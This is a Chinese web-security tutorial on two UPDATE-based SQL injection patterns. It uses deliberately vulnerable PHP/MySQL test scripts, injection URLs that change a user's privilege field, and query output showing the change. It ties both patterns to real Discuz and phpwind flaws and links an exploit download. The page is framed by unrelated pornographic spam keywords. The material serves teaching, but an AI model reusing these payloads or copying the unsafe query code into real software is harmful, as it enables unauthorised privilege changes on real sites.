色婷婷国产精品免费网站_av在线官网_色综合色综合_欧美精品一区二区三区蜜桃视频_成人免费视频观看视频_国产午夜精品一区二区三区视频

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 安全教程 查看內(nèi)容

UPDATE注射的兩個基本模式

2022-9-24 10:51| 查看: 2616 |來源: 互聯(lián)網(wǎng)

一.測試環(huán)境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache 1.3.33 二.測試數(shù)據(jù)庫結(jié)構(gòu): -----start--- -- 數(shù)據(jù)庫: `test` -- -- ----------------------------
一.測試環(huán)境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
二.測試數(shù)據(jù)庫結(jié)構(gòu):
-----start---
-- 數(shù)據(jù)庫: `test`
--
-- --------------------------------------------------------
--
-- 表的結(jié)構(gòu) `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 導(dǎo)出表中的數(shù)據(jù) `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
三.測試模式:
1,變量沒有帶’’或""[MOD1]
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");
$sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "

SQL Query:$sql

";
?>
腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權(quán)限等級,我們的目的就是通過構(gòu)造$p 來達(dá)
到修改groupid的目的:
那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查詢:
mysql> select * from userinfo;
--------- ------- --------
| groudid | user | pass |
--------- ------- --------
| 1 | heige | 123456 |
--------- ------- --------
1 row in set (0.01 sec)
用戶heige的groudid又2改為1了 :)
所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個就是我們的模式1。
2,變量帶’’或""[MOD2]
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "

SQL Query:$sql

";
?>
為了關(guān)閉’我們構(gòu)造$p應(yīng)該為123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了\’
提交的語句變成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’
mysql查詢:
mysql> select * from userinfo;
--------- ------- --------------------
| groudid | user | pass |
--------- ------- --------------------
| 2 | heige | 123456’,groudid=’1 |
--------- ------- --------------------
1 row in set (0.00 sec)
groudid并沒有被修改。那么在變量被’’或""時 就完全沒有被注射呢?不是 下面我們看模式2:
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的數(shù)據(jù)寫入數(shù)據(jù)庫
$sql= "select pass from userinfo where user=’heige’";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]
$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我們測試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
回mysql查詢下 :
mysql> select * from userinfo;
--------- ------- --------
| groudid | user | pass |
--------- ------- --------
| 1 | heige | 123456 |
--------- ------- --------
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid為1。 這個就是我們的模式2了,簡單的描敘如下:
update-->select-->update
四.實(shí)際模式
模式1:Discuz 2.0/2.2 register.php 注射
漏洞分析:http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞
漏洞分析:
update (profile.php 注射變量為$proicon update語句里為,icon=’$userdb[icon]’)
|
v
select (jop.php)
|
v
updtate (jop.php) Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

本文最后更新于 2022-9-24 10:51,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 97在线免费视频 | 国产免费一级 | 黄视频免费在线观看 | 久久久久女人精品毛片九一 | 中文字幕av在线播放 | 91精品久久久久 | 精品一区二区国产 | 午夜免费av | 国产成人在线播放 | 国产精品久久久久久久久久 | 99这里只有精品 | 黄色成人在线视频 | 日韩成人免费视频 | 国产免费av网站 | 欧美一区二区在线播放 | 国产乱码久久久久久 | 一区二区高清 | avxxxxx| 国产乱码一区二区三区 | 91久久久久久久久久 | 一区二区三区四区精品 | av激情影院 | 亚洲一区二区三区在线视频 | 中文在线视频 | 精品一区二区三区免费 | 天天干天天操天天爽 | 国产一级网站 | 色婷婷综合网 | 久久这里都是精品 | 日韩欧美一级 | 成人在线观看网站 | 日韩精品综合 | 99中文字幕 | 国产伦精品一区二区三区免费视频 | 日韩欧美一区在线 | 日韩激情久久 | 欧美日韩在线不卡 | 国内精品国产成人国产三级 | 激情啪啪网 | 在线观看福利影院 | 久久亚洲欧美 |